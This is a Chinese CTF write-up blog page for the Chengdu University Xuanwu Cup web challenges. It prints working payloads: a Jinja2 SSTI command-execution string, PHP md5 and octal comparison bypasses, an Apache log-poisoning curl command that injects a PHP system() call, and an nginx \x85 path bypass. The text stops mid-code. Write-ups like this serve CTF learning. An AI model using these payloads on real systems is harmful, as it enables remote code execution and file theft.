<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="锦家有什么查看源码发现&#x2F;try_a_try  直接猜参数是name果真！果然也是ssti直接秒了 12try_a_try?name&#x3D;&#123;&#123;lipsum.__globals__.os.popen(&#x27;tac &#x2F;f*&#x27;).read()&#125;&#125;NSSCTF&#123;191c23bd-63f0-4383-8719-15471a3e78e8&amp;#">
<meta property="og:type" content="article">
<meta property="og:title" content="成都大学第八届玄武杯（ak）">
<meta property="og:url" content="https://rufeii.github.io/2025/11/02/%E6%88%90%E9%83%BD%E5%A4%A7%E5%AD%A6%E7%AC%AC%E5%85%AB%E5%B1%8A%E7%8E%84%E6%AD%A6%E6%9D%AF%EF%BC%88ak%EF%BC%89/index.html">
<meta property="og:site_name" content="Rufeii">
<meta property="og:description" content="锦家有什么查看源码发现&#x2F;try_a_try  直接猜参数是name果真！果然也是ssti直接秒了 12try_a_try?name&#x3D;&#123;&#123;lipsum.__globals__.os.popen(&#x27;tac &#x2F;f*&#x27;).read()&#125;&#125;NSSCTF&#123;191c23bd-63f0-4383-8719-15471a3e78e8&amp;#">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://rufeii.github.io/images/achieve/2025/11/1.png">
<meta property="og:image" content="https://rufeii.github.io/images/achieve/2025/11/2.png">
<meta property="og:image" content="https://rufeii.github.io/images/achieve/2025/11/3.png">
<meta property="og:image" content="https://rufeii.github.io/images/achieve/2025/11/4.png">
<meta property="og:image" content="https://rufeii.github.io/images/achieve/2025/11/5.png">
<meta property="og:image" content="https://rufeii.github.io/images/achieve/2025/11/6.png">
<meta property="article:published_time" content="2025-11-02T04:19:59.000Z">
<meta property="article:modified_time" content="2025-11-02T14:58:09.164Z">
<meta property="article:author" content="Rufeii">
<meta property="article:tag" content="ssti">
<meta property="article:tag" content="fastapi内存马">
<meta property="article:tag" content="文件包含">
<meta property="article:tag" content="sudo提权">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://rufeii.github.io/images/achieve/2025/11/1.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/website.jpg">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/website.jpg" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/website.jpg">
        
      
    
    <!-- title -->
    <title>成都大学第八届玄武杯（ak）</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">h0me</a></li><!--
     --><!--
       --><li><a href="/about/">ab0ut</a></li><!--
     --><!--
       --><li><a href="/archives/">artic1es</a></li><!--
     --><!--
       --><li><a href="/tags/">tags</a></li><!--
     --><!--
       --><li><a href="/links/">links</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2025/11/03/FastAPI%E4%B8%8B%E7%9A%84%E5%86%85%E5%AD%98%E9%A9%AC/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2025/10/30/RootersCTF2019/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://rufeii.github.io/2025/11/02/%E6%88%90%E9%83%BD%E5%A4%A7%E5%AD%A6%E7%AC%AC%E5%85%AB%E5%B1%8A%E7%8E%84%E6%AD%A6%E6%9D%AF%EF%BC%88ak%EF%BC%89/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://rufeii.github.io/2025/11/02/%E6%88%90%E9%83%BD%E5%A4%A7%E5%AD%A6%E7%AC%AC%E5%85%AB%E5%B1%8A%E7%8E%84%E6%AD%A6%E6%9D%AF%EF%BC%88ak%EF%BC%89/&text=成都大学第八届玄武杯（ak）"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://rufeii.github.io/2025/11/02/%E6%88%90%E9%83%BD%E5%A4%A7%E5%AD%A6%E7%AC%AC%E5%85%AB%E5%B1%8A%E7%8E%84%E6%AD%A6%E6%9D%AF%EF%BC%88ak%EF%BC%89/&title=成都大学第八届玄武杯（ak）"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://rufeii.github.io/2025/11/02/%E6%88%90%E9%83%BD%E5%A4%A7%E5%AD%A6%E7%AC%AC%E5%85%AB%E5%B1%8A%E7%8E%84%E6%AD%A6%E6%9D%AF%EF%BC%88ak%EF%BC%89/&is_video=false&description=成都大学第八届玄武杯（ak）"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=成都大学第八届玄武杯（ak）&body=Check out this article: https://rufeii.github.io/2025/11/02/%E6%88%90%E9%83%BD%E5%A4%A7%E5%AD%A6%E7%AC%AC%E5%85%AB%E5%B1%8A%E7%8E%84%E6%AD%A6%E6%9D%AF%EF%BC%88ak%EF%BC%89/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://rufeii.github.io/2025/11/02/%E6%88%90%E9%83%BD%E5%A4%A7%E5%AD%A6%E7%AC%AC%E5%85%AB%E5%B1%8A%E7%8E%84%E6%AD%A6%E6%9D%AF%EF%BC%88ak%EF%BC%89/&title=成都大学第八届玄武杯（ak）"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://rufeii.github.io/2025/11/02/%E6%88%90%E9%83%BD%E5%A4%A7%E5%AD%A6%E7%AC%AC%E5%85%AB%E5%B1%8A%E7%8E%84%E6%AD%A6%E6%9D%AF%EF%BC%88ak%EF%BC%89/&title=成都大学第八届玄武杯（ak）"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://rufeii.github.io/2025/11/02/%E6%88%90%E9%83%BD%E5%A4%A7%E5%AD%A6%E7%AC%AC%E5%85%AB%E5%B1%8A%E7%8E%84%E6%AD%A6%E6%9D%AF%EF%BC%88ak%EF%BC%89/&title=成都大学第八届玄武杯（ak）"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://rufeii.github.io/2025/11/02/%E6%88%90%E9%83%BD%E5%A4%A7%E5%AD%A6%E7%AC%AC%E5%85%AB%E5%B1%8A%E7%8E%84%E6%AD%A6%E6%9D%AF%EF%BC%88ak%EF%BC%89/&title=成都大学第八届玄武杯（ak）"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://rufeii.github.io/2025/11/02/%E6%88%90%E9%83%BD%E5%A4%A7%E5%AD%A6%E7%AC%AC%E5%85%AB%E5%B1%8A%E7%8E%84%E6%AD%A6%E6%9D%AF%EF%BC%88ak%EF%BC%89/&name=成都大学第八届玄武杯（ak）&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://rufeii.github.io/2025/11/02/%E6%88%90%E9%83%BD%E5%A4%A7%E5%AD%A6%E7%AC%AC%E5%85%AB%E5%B1%8A%E7%8E%84%E6%AD%A6%E6%9D%AF%EF%BC%88ak%EF%BC%89/&t=成都大学第八届玄武杯（ak）"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%94%A6%E5%AE%B6%E6%9C%89%E4%BB%80%E4%B9%88"><span class="toc-number">1.</span> <span class="toc-text">锦家有什么</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ez-include"><span class="toc-number">2.</span> <span class="toc-text">ez_include</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#normal-php"><span class="toc-number">3.</span> <span class="toc-text">normal_php</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%9C%BC%E8%A7%81%E4%B8%8D%E4%B8%80%E5%AE%9A%E4%B8%BA%E5%AE%9E"><span class="toc-number">4.</span> <span class="toc-text">眼见不一定为实</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ez-file"><span class="toc-number">5.</span> <span class="toc-text">ez_file</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ez-include-revenge"><span class="toc-number">6.</span> <span class="toc-text">ez_include_revenge</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%9D%9E%E9%A2%84%E6%9C%9F"><span class="toc-number">6.1.</span> <span class="toc-text">非预期</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%A2%84%E6%9C%9F"><span class="toc-number">6.2.</span> <span class="toc-text">预期</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ez-fastapi"><span class="toc-number">7.</span> <span class="toc-text">ez_fastapi</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%9D%9E%E9%A2%84%E6%9C%9F-1"><span class="toc-number">7.1.</span> <span class="toc-text">非预期</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%A2%84%E6%9C%9F-1"><span class="toc-number">7.2.</span> <span class="toc-text">预期</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-number">7.3.</span> <span class="toc-text">总结</span></a></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        成都大学第八届玄武杯（ak）
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">Rufeii</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2025-11-02T04:19:59.000Z" class="dt-published" itemprop="datePublished">2025-11-02</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/%E8%B5%9B%E9%A2%98/">赛题</a>
    </div>


      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/fastapi%E5%86%85%E5%AD%98%E9%A9%AC/" rel="tag">fastapi内存马</a>, <a class="p-category" href="/tags/ssti/" rel="tag">ssti</a>, <a class="p-category" href="/tags/sudo%E6%8F%90%E6%9D%83/" rel="tag">sudo提权</a>, <a class="p-category" href="/tags/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" rel="tag">文件包含</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h2 id="锦家有什么"><a href="#锦家有什么" class="headerlink" title="锦家有什么"></a>锦家有什么</h2><p>查看源码发现&#x2F;try_a_try</p>
<p><img src="/images/achieve/2025/11/1.png"></p>
<p>直接猜参数是name果真！果然也是ssti直接秒了</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">try<span class="built_in">_</span>a<span class="built_in">_</span>try?name=&#123;&#123;lipsum.<span class="built_in">_</span><span class="built_in">_</span>globals<span class="built_in">_</span><span class="built_in">_</span>.os.popen(&#x27;tac /f*&#x27;).read()&#125;&#125;</span><br><span class="line">NSSCTF&#123;191c23bd-63f0-4383-8719-15471a3e78e8&#125;</span><br></pre></td></tr></table></figure>

<h2 id="ez-include"><a href="#ez-include" class="headerlink" title="ez_include"></a>ez_include</h2><p>这题就不分析代码了，?page&#x3D;&#x2F;flag就直接秒了！有个加强版的，待会直接就在那题分析代码了！</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">NSSCTF&#123;216a17fb-19f6-49e7-863b-bd0eb63d86b7&#125;</span><br></pre></td></tr></table></figure>

<h2 id="normal-php"><a href="#normal-php" class="headerlink" title="normal_php"></a>normal_php</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">include</span> <span class="string">&#x27;next.php&#x27;</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;a&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$a</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;a&#x27;</span>];</span><br><span class="line">    <span class="variable">$c</span>=<span class="variable">$_POST</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">    <span class="title function_ invoke__">parse_str</span>(<span class="variable">$a</span>,<span class="variable">$b</span>);</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$b</span>[<span class="string">&#x27;cdusec&#x27;</span>]!==<span class="variable">$c</span> &amp;&amp; <span class="title function_ invoke__">md5</span>(<span class="variable">$b</span>[<span class="string">&#x27;cdusec&#x27;</span>])==<span class="title function_ invoke__">md5</span>(<span class="variable">$c</span>))&#123;</span><br><span class="line">        <span class="variable">$num1</span>=<span class="variable">$b</span>[<span class="string">&#x27;num&#x27;</span>][<span class="number">0</span>];</span><br><span class="line">        <span class="variable">$num2</span>=<span class="variable">$b</span>[<span class="string">&#x27;num&#x27;</span>][<span class="number">1</span>];</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span>(<span class="title function_ invoke__">in_array</span>(<span class="number">10520</span>,<span class="variable">$b</span>[<span class="string">&#x27;num&#x27;</span>]))&#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;记住这个数&quot;</span>;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&quot;</span>;</span><br><span class="line">        &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">&quot;这都记不住?&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span>(<span class="variable">$num2</span>==<span class="number">114514</span>)&#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">&quot;我不想要这个数字!&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span>(<span class="title function_ invoke__">preg_match</span>(<span class="string">&quot;/[a-z]/i&quot;</span>, <span class="variable">$num2</span>))&#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">&quot;还想十六进制绕过?&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span>(<span class="title function_ invoke__">strpos</span>(<span class="variable">$num2</span>, <span class="string">&quot;0&quot;</span>))&#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">&quot;还想八进制绕过?&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span>(<span class="title function_ invoke__">intval</span>(<span class="variable">$num2</span>,<span class="number">0</span>)==<span class="number">114514</span>)&#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;好了你可以去下一关了&quot;</span>.<span class="variable">$next</span>;</span><br><span class="line">        &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;我现在又想要了,嘻嘻&quot;</span>;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;不er,md5你不会&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;你看看传什么呢&quot;</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><code>parse_str($a,$b);</code>将字符串$a解析成数组存入$b</p>
<p><code>if(strpos($num2, &quot;0&quot;))</code>0在第一位返回的就是0，所以可以直接8进制绕过</p>
<p>payload（&amp;要url编码不然就会被认为是参数分割符）</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?a=cdusec=QNKCDZO<span class="comment">%26num[]=10520%26num[]=0337522</span></span><br><span class="line">post:</span><br><span class="line">c=240610708</span><br></pre></td></tr></table></figure>

<p>第二关&#x2F;leeevvvel2222222.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#flag在/flag中，试着读读?</span></span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;filename&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$file</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;filename&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!<span class="title function_ invoke__">preg_match</span>(<span class="string">&quot;/flag|php|filter|base64|text|read|resource|\=|\&#x27;|\&quot;|\,/&quot;</span>,<span class="variable">$file</span>))&#123;</span><br><span class="line">        <span class="keyword">include</span>(<span class="variable">$file</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>伪协议都用不了有waf，那就日志包含，apache服务器</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">/var/log/apache/access.log之前一直以为是这个，但是查了一下现在不是了</span><br><span class="line">/var/log/apache2/access.log是这个，直接打就行了</span><br><span class="line">curl -H &quot;User-Agent: &lt;?php system(&#x27;tac /f*&#x27;);?&gt;&quot; &quot;http://node10.anna.nssctf.cn:22383/leeevvvel2222222.php&quot;</span><br><span class="line"></span><br><span class="line">NSSCTF&#123;4c29beda-b185-46bc-9fb2-efccf4b193b9&#125;</span><br></pre></td></tr></table></figure>

<h2 id="眼见不一定为实"><a href="#眼见不一定为实" class="headerlink" title="眼见不一定为实"></a>眼见不一定为实</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, render_template</span><br><span class="line"></span><br><span class="line">app = Flask(__name__, template_folder=<span class="string">&quot;templates&quot;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&quot;/&quot;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">index</span>():</span><br><span class="line">    <span class="keyword">return</span> render_template(<span class="string">&quot;index.html&quot;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&quot;/secret&quot;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">secret</span>():</span><br><span class="line">    <span class="keyword">return</span> os.getenv(<span class="string">&quot;FLAG&quot;</span>, <span class="string">&quot;NSSCTF&#123;default&#125;&quot;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    app.run(<span class="string">&quot;0.0.0.0&quot;</span>, <span class="number">8080</span>, debug=<span class="literal">False</span>)</span><br></pre></td></tr></table></figure>

<p>直接访问403禁止看下题目</p>
<p><img src="/images/achieve/2025/11/2.png"></p>
<p>Nginx 和 Python 对 URL 路径的解析方式可能不同，意思就是让我们弄个路径Nginx不能解析成&#x2F;secret，但是python可以解析成&#x2F;secret</p>
<p>上网查了一下还真有<a target="_blank" rel="noopener" href="https://xz.aliyun.com/news/18629">Nginx 路径绕过-先知社区</a></p>
<p>nginx.config</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">server &#123;</span><br><span class="line">    listen       80;</span><br><span class="line">    server<span class="built_in">_</span>name  localhost;</span><br><span class="line"></span><br><span class="line">    location ~* <span class="built_in">^</span>/secret/?<span class="built_in">$</span> &#123;</span><br><span class="line">        deny all;</span><br><span class="line">        return 403;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    location ~* <span class="built_in">^</span>/secret/ &#123;</span><br><span class="line">        deny all;</span><br><span class="line">        return 403;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    location / &#123;</span><br><span class="line">        proxy<span class="built_in">_</span>pass http://127.0.0.1:8080;</span><br><span class="line">        proxy<span class="built_in">_</span>set<span class="built_in">_</span>header Host <span class="built_in">$</span>host;</span><br><span class="line">        proxy<span class="built_in">_</span>set<span class="built_in">_</span>header X-Real-IP <span class="built_in">$</span>remote<span class="built_in">_</span>addr;</span><br><span class="line">        proxy<span class="built_in">_</span>set<span class="built_in">_</span>header X-Forwarded-For <span class="built_in">$</span>proxy<span class="built_in">_</span>add<span class="built_in">_</span>x<span class="built_in">_</span>forwarded<span class="built_in">_</span>for;</span><br><span class="line">        proxy<span class="built_in">_</span>set<span class="built_in">_</span>header X-Forwarded-Proto <span class="built_in">$</span>scheme;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>Nginx 配置的核心访问控制部分，我们看看它是怎么处理的可以看到它用正则匹配了所有的&#x2F;secret后面加或者不加任何东西，但是一些特殊的字符匹配不到，比如不可见字符\x85</p>
<p><img src="/images/achieve/2025/11/3.png"></p>
<p>改成85发包即可！</p>
<h2 id="ez-file"><a href="#ez-file" class="headerlink" title="ez_file"></a>ez_file</h2><p>开局就登录页面，扫出个&#x2F;<a target="_blank" rel="noopener" href="http://www.zip/">www.zip</a></p>
<p>login.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">#悄悄的，校内赛道第一个找到学长的秘密的私信学长秘密内容给奶茶喝</span></span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">session_start</span>();</span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"><span class="comment">#header(&#x27;Content-Type: application/json&#x27;);</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="variable">$params</span> = [];</span><br><span class="line"><span class="variable">$role</span> = <span class="string">&quot;guest&quot;</span>;</span><br><span class="line"><span class="variable">$admin_role</span> = <span class="string">&quot;admin&quot;</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="title function_ invoke__">stripos</span>(<span class="variable">$_SERVER</span>[<span class="string">&quot;CONTENT_TYPE&quot;</span>] , <span class="string">&quot;application/json&quot;</span>) !== <span class="literal">false</span>) &#123;</span><br><span class="line">    <span class="variable">$raw</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="string">&quot;php://input&quot;</span>);</span><br><span class="line">    <span class="variable">$data</span> = <span class="title function_ invoke__">json_decode</span>(<span class="variable">$raw</span>, <span class="literal">true</span>);</span><br><span class="line">    <span class="keyword">if</span> (<span class="title function_ invoke__">json_last_error</span>() === JSON_ERROR_NONE) &#123;</span><br><span class="line">        <span class="variable">$params</span> = <span class="variable">$data</span>;</span><br><span class="line">        <span class="keyword">foreach</span> (<span class="variable">$params</span> <span class="keyword">as</span> 